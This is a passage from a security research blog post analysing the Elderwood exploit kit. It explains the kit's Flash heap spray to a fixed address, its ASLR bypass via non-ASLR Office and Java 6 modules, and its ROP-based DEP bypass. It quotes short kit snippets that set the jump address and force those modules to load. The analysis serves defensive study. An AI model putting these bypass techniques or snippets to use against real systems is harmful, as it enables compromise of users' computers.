The SWF is included before the JavaScript exploit code is loaded. When the swf is loaded, the heap spraying code is run automatically. The user does not need to know about the details of the technique that it uses. The end result is that the heap is full of the stack frames and the kit user can assume that proper values will be at a specific address, 0x10ab0d0c. This means that the user only needs to know the single value of where to jump to.

window.location = unescape("%u0d0c%u10abhttps://www.google.com/settings/account");

For readers following along with our analysis, the software used to obfuscate the Flash component of the exploit is conveniently located on the first page of Google results for “SWF Encryption.” DoSWF is the first result that does not require an email address to download the installer and, as an added bonus, is developed by a Chinese company from Beijing.

As seen with many public exploits, it’s possible to perform this same task with only the JavaScript engine within the browser. This would remove the dependency on a third party plugin. Instead, this exploit will only work on browsers that have Flash installed and enabled. Techniques and libraries to perform precise heap manipulation in JavaScript are well-documented and have existed since at least 2007.

ASLR Bypass (Microsoft Office and Java 6)

Address Space Layout Randomization (ASLR) is an exploit mitigation present on Windows Vista and newer that randomizes the location of code in memory. ASLR frustrates an attacker’s ability to control program flow by making the location of code used for ROP gadgets unknown for reuse. The easiest possible method to bypass ASLR is to avoid it entirely by locating a module that is not compiled with the Dynamic Base flag, indicating a lack of support for this feature. This makes exploitation significantly easier and eliminates the advantage conferred by this mitigation entirely. Once such a module is loaded at fixed virtual address, the attacker can repurpose known instruction sequences within it as if ASLR did not exist.

In order to bypass ASLR, the kit comes with code to load several modules that are not compiled with the Dynamic Base flag. In this case, modules from Microsoft Office 2007/2010 and the Java 6 plugin without support for ASLR have been added. Memory addresses from within these modules are used to construct the ROP chains embedded in the Flash document.

It is trivial to take advantage of this feature to bypass ASLR. In all likelihood, a script is provided by the kit to call the various plugin loading routines necessary to load the correct modules. No further work is required. The kit authors use existing research and techniques off the shelf in order to develop these scripts: sample code from Oracle is used to load Java for their ASLR bypass. This example code shows up in Google using the search “force java 6” which is notable since the author needed to specifically load this version rather than the latest, which takes advantage of ASLR.

<script type="text/javascript" src="deployJava.js"></script>
try {
	location.href = 'ms-help://'
} catch (e) {}

try {
	var ma = new ActiveXObject("SharePoint.OpenDocuments.4");
} catch(e) {}

After attempting to load these plugins, config.html sets a value based on which ones were successful. It sets the innerHTML of the “test” div tag to either true, false, default or cat. Today.swf reads this value to determine which of its built-in ROP chains to load. This means that today.swf directly depends on the results of config.html and the plugins it loads, suggesting they were likely developed together and provided for the kit user.

As with the heap spray and DEP bypass, these techniques rely on third-party components to function. Unless one of these plugins is installed and enabled, the exploit will fail on Windows 7. The kit relies on Java to be outdated because its current versions do take advantage of ASLR. This issue was addressed with a Java 6 update in July 2011 and Java 7 was never affected. In the case of Microsoft Office, this weakness was described in a public walkthrough several months before the attack, however, it remained unpatched until after the attack.

We attempted to measure the number of browsers running these plugins in order to measure the effectiveness of these ASLR bypasses and, therefore, the entire exploit. What we found is that popular websites that track browser statistics neglect to track usage of Microsoft Office plugins, instead opting to list more common plugins like Silverlight, Google Gears and Shockwave. In the case of Java 6, if this were the best case scenario and no minor versions of Java had been patched yet, only roughly 30% of website visitors could be successfully exploited.

Conclusions

The Elderwood kit ships with reusable components for developing exploits for use-after-free vulnerabilities. It provides a capability to spray the heap with Adobe Flash, a set of techniques to load modules without support for ASLR, and several ROP chains for various versions of Windows to bypass DEP. The user of these tools needs little to no understanding of the tasks which they accomplish. For example, instead of requiring the user to understand anything about memory layouts and heap allocations, they can simply use a constant address provided by the kit. In fact, readers who made it this far may have deeper understanding of these components than the people who need to use them.

Many exploit development needs are accounted for by using these tools, however, some tasks are specific to the discovered vulnerability. In order to use the ROP gadgets that have been placed in memory by the SWF, the toolkit user must have control of program flow. This is specific to the exploitation of each vulnerability and the toolkit cannot help the user perform this task. We discuss the specific solutions to this problem by the toolkit user in the next section.

If you’re interested in learning more about how modern attacks are developed and performed, consider coming to SummerCon early next month and taking one of our trainings. Subscribe to our newsletter to stay up-to-date on our trainings, products and blog posts.

Follow

Get every new post delivered to your Inbox.

Join 3,758 other followers